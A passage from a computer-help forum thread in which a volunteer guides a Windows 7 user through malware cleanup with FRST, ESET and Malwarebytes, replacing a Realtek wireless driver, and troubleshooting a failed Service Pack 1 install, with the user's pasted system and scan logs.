Description: Display is not active

Error: (11/10/2014 02:53:54 PM) (Source: atikmdag) (EventID: 19468) (User: )
Description: CPLIB :: General - Invalid Parameter


Microsoft Office Sessions:
=========================
Error: (11/10/2014 07:49:11 AM) (Source: VSS) (EventID: 12305) (User: )
Description: DeviceIoControl(\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4 - 000000F4,0x00560034,00C85060,0,00C84058,4096,[0])

Operation:
   Processing PostFinalCommitSnapshots

Context:
   Execution Context: System Provider

Error: (11/07/2014 08:15:10 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: plugin-container.exe33.0.2.5413544ef530mozalloc.dll33.0.2.5413544ed0898000000300001425127001cff72bf9232302C:\Program Files\Mozilla Firefox\plugin-container.exeC:\Program Files\Mozilla Firefox\mozalloc.dlld38e950e-66fd-11e4-922c-88ae1d506189

Error: (09/16/2014 07:01:38 PM) (Source: Microsoft Office 14) (EventID: 2000) (User: )
Description: Microsoft PublisherPublisher failed to start correctly last time.  Starting Publisher in safe mode will help you correct or isolate a startup problem in order to successfully start the program.  Some functionality may be disabled in this mode.

Do you want to start Publisher in safe mode?

Error: (09/16/2014 06:56:06 PM) (Source: Microsoft Office 14) (EventID: 2001) (User: )
Description: Microsoft PublisherPublisher failed to launch in safe mode. Do you want to start repair?

Error: (09/16/2014 06:49:33 PM) (Source: Microsoft Office 14) (EventID: 2000) (User: )
Description: Microsoft PublisherPublisher failed to start correctly last time.  Starting Publisher in safe mode will help you correct or isolate a startup problem in order to successfully start the program.  Some functionality may be disabled in this mode.

Do you want to start Publisher in safe mode?

Error: (07/08/2014 04:20:15 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: C:\windows\system32\svchost.exe -k netsvcsWindows Update0x81000101

Error: (06/11/2014 05:38:40 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: C:\windows\system32\svchost.exe -k netsvcsWindows Update0x81000101

Error: (06/02/2014 05:05:58 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: GoogleUpdate.exe1.2.183.94ad50798goopdate.dll_unloaded0.0.0.053604624c00000056241dab2161001cf7e6cfcf73ef1C:\Program Files\Google\Update\GoogleUpdate.exegoopdate.dll37f276a4-eabb-11e3-899c-88ae1d506189

Error: (05/23/2014 03:44:17 PM) (Source: System Restore) (EventID: 8193) (User: )
Description: C:\windows\system32\svchost.exe -k netsvcsWindows Update0x81000101

Error: (05/09/2014 05:05:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: firefox.exe28.0.0.518653240e37xul.dll28.0.0.518653240e04c00000050018472999001cf601bef1f525fC:\Program Files\Mozilla Firefox\firefox.exeC:\Program Files\Mozilla Firefox\xul.dll214a2e57-d7df-11e3-9797-88ae1d506189


CodeIntegrity Errors:
===================================
  Date: 2014-11-09 22:43:31.422
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.422
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.422
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.406
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.406
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.406
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\ELAMBKUP\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.375
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\KLELAMX86\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.375
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\KLELAMX86\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.375
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\KLELAMX86\klelam.sys because the set of per-page image hashes could not be found on the system.

  Date: 2014-11-09 22:43:31.359
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\KLELAMX86\klelam.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: AMD Sempron™ SI-42
Percentage of memory in use: 77%
Total physical RAM: 1790.42 MB
Available physical RAM: 395.96 MB
Total Pagefile: 3580.84 MB
Available Pagefile: 1758.48 MB
Total Virtual: 2047.88 MB
Available Virtual: 1921.75 MB

==================== Drives ================================

Drive c: (TI105866W0A) (Fixed) (Total:223.33 GB) (Free:164.98 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 232.9 GB) (Disk ID: 96360D50)
Partition 1: (Active) - (Size=1.5 GB) - (Type=27)
Partition 2: (Not Active) - (Size=223.3 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=8.1 GB) - (Type=17)

==================== End Of Log ============================


  • 0

#8
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts

Step 1:
Download attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.
 
Step 2:

  • Open Chrome.
  • Copy and paste the following in the address bar and press Enter:

chrome://plugins

  • You will get a page with all the plugins listed. There is an option to disable each plugin.
  • Press "Disable" under each plugin involved. Then press "Enable".
  • Close Chrome.

 
Step 3:
You are using potentially unstable Chrome version. There are four main release channels Chrome browser. You have installed dev channel witch means this version is released as soon as they can. Of course this version is tested, but still may have bugs. You may consider uninstall it and install Chrome from http://www.google.com/chrome/.

 
Step 4:

  • Copy following text:

RTL8187Se.sys

  • Run again FRST and paste it next to Search:
  • Hit Search Files button, post the result.

Attached Files


  • 0

#9
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts

Here are fixlog.txt, followed by search.txt:

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 09-11-2014 01
Ran by Mom at 2014-11-11 15:18:40 Run:1
Running from C:\Users\Mom\Desktop
Loaded Profile: Mom (Available profiles: Mom)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
CloseProcesses:
SearchScopes: HKLM - DefaultScope value is missing.
CHR Extension: (ApptoU) - C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnfghhpmgeifbilieglncablibafbhdd [2014-11-08]
CMD: dir /a "C:\Program Files"
CMD: dir /a C:\ProgramData
CMD: dir /a C:\Users\Mom\AppData\Local
CMD: dir /a C:\Users\Mom\AppData\LocalLow
CMD: dir /a C:\Users\Mom\AppData\Roaming
*****************

Processes closed successfully.
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value was restored successfully.
C:\Users\Mom\AppData\Local\Google\Chrome\User Data\Default\Extensions\bnfghhpmgeifbilieglncablibafbhdd => Moved successfully.

=========  dir /a "C:\Program Files" =========

 Volume in drive C is TI105866W0A
 Volume Serial Number is BAAE-36FD

 Directory of C:\Program Files

11/10/2014  02:34 PM    <DIR>          .
11/10/2014  02:34 PM    <DIR>          ..
12/30/2012  07:07 PM    <DIR>          Adobe
07/07/2010  10:24 PM    <DIR>          ATI
07/07/2010  10:25 PM    <DIR>          ATI Technologies
02/20/2013  03:39 PM    <DIR>          CCleaner
11/09/2014  07:54 AM    <DIR>          Common Files
08/27/2009  08:07 PM    <DIR>          Corel
07/13/2009  08:41 PM               174 desktop.ini
07/13/2009  11:49 PM    <DIR>          DVD Maker
11/08/2014  03:15 PM    <DIR>          Enigma Software Group
09/16/2012  03:16 PM    <DIR>          Google
12/25/2010  10:06 PM    <DIR>          InstallShield Installation Information
04/10/2013  06:24 PM    <DIR>          Internet Explorer
08/27/2009  08:12 PM    <DIR>          Intuit
08/27/2009  08:05 PM    <DIR>          Java
11/09/2014  04:50 PM    <DIR>          Kaspersky Lab
11/09/2014  07:57 AM    <DIR>          Malwarebytes Anti-Malware
06/13/2012  09:34 PM    <DIR>          Microsoft Analysis Services
07/13/2009  11:49 PM    <DIR>          Microsoft Games
06/13/2012  09:40 PM    <DIR>          Microsoft Office
07/07/2010  10:23 PM    <DIR>          Microsoft Office Suite Activation Assistant
09/11/2014  04:02 PM    <DIR>          Microsoft Security Client
08/12/2014  06:20 PM    <DIR>          Microsoft Silverlight
08/27/2009  08:16 PM    <DIR>          Microsoft SQL Server Compact Edition
10/11/2012  04:57 PM    <DIR>          Microsoft Works
06/13/2012  09:40 PM    <DIR>          Microsoft.NET
11/10/2014  03:33 PM    <DIR>          Mozilla Firefox
11/07/2014  09:28 PM    <DIR>          Mozilla Maintenance Service
07/13/2009  08:52 PM    <DIR>          MSBuild
08/27/2009  08:05 PM    <DIR>          PlayReady
03/12/2012  07:57 PM    <DIR>          RealArcade
07/07/2010  10:30 PM    <DIR>          Realtek
07/07/2010  10:31 PM    <DIR>          Realtek WLAN Driver
07/13/2009  08:52 PM    <DIR>          Reference Assemblies
10/21/2013  03:03 PM    <DIR>          SmartDraw CI
07/07/2010  10:33 PM    <DIR>          Synaptics
07/07/2010  10:29 PM    <DIR>          Temp
05/19/2011  05:24 PM    <DIR>          TOSHIBA
08/27/2009  08:13 PM    <DIR>          TOSHIBA Corporation
05/18/2011  09:17 PM    <DIR>          TOSHIBA Games
07/13/2009  08:53 PM    <DIR>          Uninstall Information
09/11/2014  09:09 PM    <DIR>          WildTangent Games
07/13/2009  08:56 PM    <DIR>          Windows Defender
05/20/2012  02:55 PM    <DIR>          Windows Journal
06/18/2013  08:47 PM    <DIR>          Windows Live
12/27/2010  08:40 PM    <DIR>          Windows Mail
12/27/2010  08:40 PM    <DIR>          Windows Media Player
07/13/2009  08:52 PM    <DIR>          Windows NT
07/13/2009  08:56 PM    <DIR>          Windows Photo Viewer
07/13/2009  08:52 PM    <DIR>          Windows Portable Devices
07/13/2009  08:56 PM    <DIR>          Windows Sidebar
               1 File(s)            174 bytes
              51 Dir(s)  179,146,366,976 bytes free

========= End of CMD: =========


=========  dir /a C:\ProgramData =========

 Volume in drive C is TI105866W0A
 Volume Serial Number is BAAE-36FD

 Directory of C:\ProgramData

11/10/2014  02:47 PM    <DIR>          .
11/10/2014  02:47 PM    <DIR>          ..
05/09/2013  08:11 PM    <DIR>          Adobe
07/13/2009  08:53 PM    <JUNCTION>     Application Data [C:\ProgramData]
07/07/2010  10:28 PM    <DIR>          ATI
05/17/2014  12:53 PM    <DIR>          BlueStacks
08/01/2012  09:19 PM    <DIR>          CanonBJ
07/13/2009  08:53 PM    <JUNCTION>     Desktop [C:\Users\Public\Desktop]
07/13/2009  08:53 PM    <JUNCTION>     Documents [C:\Users\Public\Documents]
07/13/2009  08:53 PM    <JUNCTION>     Favorites [C:\Users\Public\Favorites]
03/12/2012  07:59 PM    <DIR>          GameHouse
08/27/2009  08:17 PM    <DIR>          Google
11/11/2014  10:21 AM    <DIR>          Kaspersky Lab
11/09/2014  07:56 AM    <DIR>          Malwarebytes
06/18/2013  08:45 PM    <DIR>          Microsoft
10/20/2014  03:01 PM    <DIR>          Microsoft Help
03/05/2013  10:30 PM    <DIR>          Mozilla
12/25/2010  10:19 PM    <DIR>          Norton
08/27/2009  08:17 PM    <DIR>          NortonInstaller
07/13/2009  08:53 PM    <JUNCTION>     Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu]
07/13/2009  08:53 PM    <JUNCTION>     Templates [C:\ProgramData\Microsoft\Windows\Templates]
07/07/2010  10:44 PM    <DIR>          Toshiba
07/07/2010  10:34 PM    <DIR>          Vista32
07/07/2010  10:34 PM    <DIR>          Vista64
02/16/2013  03:35 PM    <DIR>          WildTangent
07/07/2010  10:38 PM    <DIR>          win7_32
07/07/2010  10:34 PM    <DIR>          win7_64
07/07/2010  10:34 PM    <DIR>          XP
               0 File(s)              0 bytes
              28 Dir(s)  179,137,912,832 bytes free

========= End of CMD: =========


=========  dir /a C:\Users\Mom\AppData\Local =========

 Volume in drive C is TI105866W0A
 Volume Serial Number is BAAE-36FD

 Directory of C:\Users\Mom\AppData\Local

11/10/2014  02:34 PM    <DIR>          .
11/10/2014  02:34 PM    <DIR>          ..
11/01/2014  01:10 PM    <DIR>          Adobe
12/25/2010  09:05 PM    <JUNCTION>     Application Data [C:\Users\Mom\AppData\Local]
12/25/2010  10:08 PM    <DIR>          ATI
04/10/2014  04:36 PM    <DIR>          ElevatedDiagnostics
11/16/2012  02:53 PM            96,640 GDIPFONTCACHEV1.DAT
09/16/2012  03:16 PM    <DIR>          Google
12/25/2010  09:05 PM    <JUNCTION>     History [C:\Users\Mom\AppData\Local\Microsoft\Windows\History]
11/10/2014  02:36 PM         6,507,196 IconCache.db
06/15/2012  09:41 PM    <DIR>          Macromedia
10/02/2014  06:53 PM    <DIR>          Microsoft
12/31/2012  12:52 PM    <DIR>          Microsoft Games
01/10/2011  07:08 PM    <DIR>          Microsoft Help
10/04/2013  10:28 PM    <DIR>          Mozilla
11/07/2014  08:14 PM    <DIR>          Programs
07/18/2011  10:13 AM    <DIR>          Spotify
11/11/2014  03:18 PM    <DIR>          Temp
12/25/2010  09:05 PM    <JUNCTION>     Temporary Internet Files [C:\Users\Mom\AppData\Local\Microsoft\Windows\Temporary Internet Files]
12/25/2010  10:09 PM    <DIR>          TOSHIBA
12/25/2010  10:16 PM    <DIR>          TOSHIBA_Corporation
12/25/2010  09:05 PM    <DIR>          VirtualStore
10/02/2014  06:53 PM    <DIR>          Windows Live
10/02/2014  06:53 PM    <DIR>          Windows Live Writer
               2 File(s)      6,603,836 bytes
              22 Dir(s)  179,137,912,832 bytes free

========= End of CMD: =========


=========  dir /a C:\Users\Mom\AppData\LocalLow =========

 Volume in drive C is TI105866W0A
 Volume Serial Number is BAAE-36FD

 Directory of C:\Users\Mom\AppData\LocalLow

11/10/2014  02:34 PM    <DIR>          .
11/10/2014  02:34 PM    <DIR>          ..
12/31/2012  08:48 AM    <DIR>          Adobe
12/25/2010  10:21 PM    <DIR>          Google
06/18/2013  08:40 PM    <DIR>          Microsoft
02/04/2012  12:56 PM    <DIR>          Sun
12/25/2010  10:21 PM    <DIR>          Temp
               0 File(s)              0 bytes
               7 Dir(s)  179,137,908,736 bytes free

========= End of CMD: =========


=========  dir /a C:\Users\Mom\AppData\Roaming =========

 Volume in drive C is TI105866W0A
 Volume Serial Number is BAAE-36FD

 Directory of C:\Users\Mom\AppData\Roaming

11/09/2014  07:54 AM    <DIR>          .
11/09/2014  07:54 AM    <DIR>          ..
12/31/2012  08:48 AM    <DIR>          Adobe
12/25/2010  10:08 PM    <DIR>          ATI
09/08/2014  07:07 PM    <DIR>          EncryptStick
12/25/2010  10:12 PM    <DIR>          Google
12/25/2010  10:07 PM    <DIR>          Identities
05/19/2011  05:21 PM    <DIR>          InstallShield
11/08/2014  11:51 PM    <DIR>          LavasoftStatistics
12/25/2010  10:31 PM    <DIR>          Macromedia
07/13/2009  11:48 PM    <DIR>          Media Center Programs
09/07/2014  06:22 PM    <DIR>          Microsoft
05/19/2011  05:34 PM    <DIR>          Mozilla
10/21/2013  03:39 PM    <DIR>          SmartDraw
07/26/2011  08:17 PM    <DIR>          Spotify
02/27/2012  06:42 PM    <DIR>          U3
11/08/2014  07:02 AM                42 WB.CFG
02/16/2013  03:36 PM    <DIR>          WildTangent
12/25/2010  10:06 PM    <DIR>          WinBatch
10/02/2014  06:53 PM    <DIR>          Windows Live Writer
03/12/2012  07:57 PM    <DIR>          WinRAR
               1 File(s)             42 bytes
              20 Dir(s)  179,137,908,736 bytes free

========= End of CMD: =========



The system needed a reboot.

==== End of Fixlog ====

 

 

 

Farbar Recovery Scan Tool (x86) Version: 09-11-2014 01
Ran by Mom at 2014-11-11 15:43:38
Running from C:\Users\Mom\Desktop
Boot Mode: Normal

================== Search: "RTL8187Se.sys" ===================

C:\Windows\winsxs\x86_net8187se86.inf_31bf3856ad364e35_6.1.7600.16385_none_af12632ccf817687\RTL8187Se.sys
[2009-06-10 13:18][2009-07-13 14:02] 0359424 ____A (Realtek Semiconductor Corporation                           ) 8DF69AD5F515BC15D5C30666F56288AA [File is signed]

C:\Windows\System32\DriverStore\FileRepository\net8187se86.inf_x86_neutral_dbc0aab1acd9c67e\RTL8187Se.sys
[2009-06-10 13:18][2009-07-13 14:02] 0359424 ____A (Realtek Semiconductor Corporation                           ) 8DF69AD5F515BC15D5C30666F56288AA [File is signed]

C:\Windows\System32\DriverStore\FileRepository\net8187se.inf_x86_neutral_2a4d7330d364f0d9\RTL8187Se.sys
[2010-07-07 22:31][2009-08-13 07:18] 0372736 ____A (Realtek Semiconductor Corporation                           ) 5BD298BDF62E6A8A0FC69F73A82A52BB [File is signed]

C:\Windows\System32\DriverStore\FileRepository\ips_ka_toshiba87se.inf_x86_neutral_28a1bfb9076c2195\RTL8187Se.sys
[2008-08-22 09:28][2008-08-22 09:28] 0333824 ____A (Realtek Semiconductor Corporation                           ) E48DAF453D773A89A44134CE4BA9AF44

C:\Windows\System32\drivers\RTL8187Se.sys
[2008-08-22 09:28][2008-08-22 09:28] 0333824 ____A (Realtek Semiconductor Corporation                           ) E48DAF453D773A89A44134CE4BA9AF44

C:\Program Files\Realtek WLAN Driver\rtl8187Se.sys
[2010-07-07 22:31][2009-08-13 07:18] 0372736 ____A (Realtek Semiconductor Corporation                           ) 5BD298BDF62E6A8A0FC69F73A82A52BB [File is signed]

C:\Program Files\InstallShield Installation Information\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}\rtl8187Se.sys
[2010-07-07 22:31][2009-08-13 07:18] 0372736 ____A (Realtek Semiconductor Corporation                           ) 5BD298BDF62E6A8A0FC69F73A82A52BB [File is signed]

=== End Of Search ===


  • 0

#10
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts

Step 1:
Download attached fixlist.txt file and save it to the Desktop.

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

Step 2:
Please run a free online scan with the ESET Online Scanner:

IMPORTANT: You MUST use Internet Explorer for this step!

  • Visit the ESET Online Scanner Web Page
  • Select the blue Run ESET Online Scanner button:
    xESET1_zps23a5e840.png.pagespeed.ic.Y0AU
  • Tick the box next to YES, I accept the Terms of Use and click Start
    xESET_EULA2_zps9451f1c3.png.pagespeed.ic
  • When asked, allow the ActiveX control to install.
  • Select Enable detection of potentially unwanted applications and select Advanced Settings:
    xESET2_zpsc701c045.png.pagespeed.ic.K816
  • Make sure to check the options Remove found threats and Enable Anti-Stealth technology are checked:
    xESET4_zps0afafd0d.png.pagespeed.ic.rNsA
  • Click Start. (This scan can take several hours, so please be patient):
    xESET3_zpsccd1657d.png.pagespeed.ic.Bz_G
  • Once the scan is completed, select List of found threats:
    xESET5_zpsd27be299.png.pagespeed.ic.qoYb
  • Select Export to text file... and save the file as ESETlog.txt on your Desktop:
    xESET6_zpsc17d154e.png.pagespeed.ic.Ob9h
  • Click the Back button.
  • Click the Finish button:
    xESET9_zps51587217.png.pagespeed.ic.XLit
  • Use Notepad to open the saved log file (on your Desktop- ESET.txt)[/b]
  • Copy and paste that log as a reply to this topic.

Step 3:
I've seen that you have installed Malwarebytes' Anti-Malware. Please run it.

  • If an update is found, it will download and install the latest updates automatically:
    xMBAM2_zps52e3211b.png.pagespeed.ic.QBQf
  • Now select the Settings tab, and check the box next to Scan for rootkits:
    xMBAM3_zps83324155.png.pagespeed.ic.QrFW
  • Go back to the Dashboard tab, and click the Scan Now button:
    xMBAM4_zpse3cd4a79.png.pagespeed.ic.sQWM
  • The scan may take some time to finish,so please be patient.
    xMBAM5_zps36d7537b.png.pagespeed.ic.JWYe
  • When the scan is complete, it will show you the results. (This one is clean):
    xMBAM65_zpsb0aa143c.png.pagespeed.ic.lCj
  • Make sure that everything is checked, and click Quarantine All (or similar).
  • When disinfection is completed, a log will open in Notepad and you may be prompted to Restart. (See Extra Note below) If the log doesn't open, select View detailed log in the Scantab:
    xMBAM7_zps782405f0.png.pagespeed.ic.uQEx
  • The log is automatically saved by MBAM and can be viewed by going to the History tab and clicking on Application Logs:
    xMBAM9_zps1f87702b.png.pagespeed.ic.ywPZ
  • Choose the latest Scan Log, and click on the View button:
    xMBAM10_zps5a48f689.png.pagespeed.ic.Uun
  • In the bottom of the Scanning History Log window that opens, you can click on Export > Save to Text file (*.txt). Save the report to your Desktop.
    xMBAM8_zpsad402941.png.pagespeed.ic.J4sI
  • Copy & Paste the entire contents of the report log in your next reply.
     

Extra Note: If MBAM encounters a file that is difficult to remove, you will be presented with 1 of 2 prompts, click OK to either and let MBAM proceed with the disinfection process, if asked to restart the computer, please do so immediately.

*** In your next reply, I need you to Copy&Paste the contents of the MBAM log file

 

In your next post I want to see:

  • FRST removal log
  • ESET Online Scanner log
  • MBAM log

Attached Files


  • 0

Advertisements


#11
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts

Below I have pasted fixlog.txt, ESETlog.txt, and MBAMlog.txt.

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x86) Version: 09-11-2014 01
Ran by Mom at 2014-11-12 12:31:49 Run:2
Running from C:\Users\Mom\Desktop
Loaded Profile: Mom (Available profiles: Mom)
Boot Mode: Normal

==============================================

Content of fixlist:
*****************
CloseProcesses:
Replace: C:\Program Files\InstallShield Installation Information\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}\rtl8187Se.sys C:\windows\System32\DRIVERS\RTL8187Se.sys
*****************

Processes closed successfully.
C:\windows\System32\DRIVERS\RTL8187Se.sys => Moved successfully.
C:\Program Files\InstallShield Installation Information\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}\rtl8187Se.sys copied successfully to C:\windows\System32\DRIVERS\RTL8187Se.sys


The system needed a reboot.

==== End of Fixlog ====

 

 

 

 

C:\_OTL\MovedFiles\11102014_144655\C_ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7\maintainer.bak    Win32/BrowseFox.V potentially unwanted application    deleted - quarantined
 

 

 

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 11/12/2014
Scan Time: 2:42:32 PM
Logfile: MBAMlog.txt
Administrator: Yes

Version: 2.00.3.1025
Malware Database: v2014.11.12.10
Rootkit Database: v2014.11.12.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7
CPU: x86
File System: NTFS
User: Mom

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 291418
Time Elapsed: 26 min, 38 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 3
PUP.Optional.FunWebProducts.A, HKLM\SOFTWARE\CLASSES\TelevisionFanatic.SkinLauncherSettings, Quarantined, [a445ba8083f99b9b833b6986fd05c838],
PUP.Optional.FunWebProducts.A, HKLM\SOFTWARE\CLASSES\TelevisionFanatic.SkinLauncherSettings.1, Quarantined, [40a990aaef8d8aac9e20c72825dd718f],
PUP.Optional.MindSpark.A, HKLM\SOFTWARE\MOZILLAPLUGINS\@TelevisionFanatic.com/Plugin, Quarantined, [6c7d29115c20d66092a72878cc384eb2],

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)


(end)


  • 0

#12
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts

Step 1:
Service Pack install:
Get Service Pack 1 for Windows 7 32-bit from Microsoft Download Center (look for windows6.1-KB976932-X86.exe). Install it.

Step 2:
Download and install Internet Explorer 10
Note:
If english is not your system language, please type Internet Explorer 10 in google and download from Microsoft site proper version.

Step 3:
Security upadtes:
Please go to Start Menu -> Control Panel -> Programs and Features and remove following programs:

  • Java 6 Update 14
  • Adobe Shockwave Player 11.6

Be adviced that security experts recommends to turn off Java. However if you decide you must use Java, download and install new version from Java.com

Warning.
Remember to install only software that you need. Adobe installators often install another software by default. Always check what you are installing. Unckeck optional software install:

flash.png

 

Step 4:

  • Right click on FRST to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • FRST scan

  • 0

#13
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts

I can't install SP1 - the installation appears to get about halfway then stops. The error window reports, "The referenced assembly is not installed on your system." When I click the (Details) link, I get, "Error: ERROR_SXS_ASSEMBLY_NOT_FOUND (0x800736b3)."

 

I've tried updating to SP1 before, and have had problems. My wife has reported that she has to sit through a lengthy update process every time she reboots, and I suspect that's because SP1 won't install.


  • 0

#14
crooleeck

crooleeck

    Member

  • Member
  • PipPipPip
  • 882 posts

It is very important to keep system up to date, otherwise you probably came back here soon. Please give me a try to fix it. Download and run MS System Update Readiness tool x86-based (32-bit) versions of Windows 7 SP1 and Windows 7.

  • In the Windows Update Standalone Installer dialog box, click Yes.
  • When the tool is being installed, it automatically runs. Although it typically takes less than 15 minutes to run, it might take much longer on some computers. Even if the progress bar seems to stop, the scan is still running, so don't click Cancel.

After done please copy following command:

notepad "%SYSTEMROOT%\Logs\CBS\CheckSUR.log"

Type Windows + R and paste it into Run dialog. Hit enter.

 

Notepad will be open, please save the log as CheckSUR.txt and post it in next replay.

 

In meantime you can process step 4 from last post - Java and Adobe Shockwave updates.


  • 0

#15
mulligabuck

mulligabuck

    Member

  • Topic Starter
  • Member
  • PipPip
  • 62 posts

I had already uninstalled Java and updated Shockwave.

 

Below I've pasted CheckSUR.txt. By the way, I did some research while you were working on the problem, and it seems that in some cases a repair install is advised. If we get to that point - and I know we would prefer to avoid it - I've got an installation disk in hand (burned from a digitalrivercontent download from what appears to be a reputable site) and the product key written down. All I would need to do, I think, is back up the drivers. Anyway, as I said, I'm sure you would want to do that only as a last resort, and I won't mess with it unless you say so.

 

=================================
Checking System Update Readiness.
Binary Version 6.1.7601.22471
Package Version 26.0
2014-11-14 08:15

Checking Windows Servicing Packages

Checking Package Manifests and Catalogs

Checking Package Watchlist

Checking Component Watchlist

Checking Packages

Checking Component Store
(f)    CSI Missing Identity    0x00000000    appid    wpdcomp.inf_31bf3856ad364e35_6.1.7601.17514_7b98abdd69c0f702    

Summary:
Seconds executed: 1221
 Found 1 errors
  CSI Missing Identity Total count: 1
 


  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP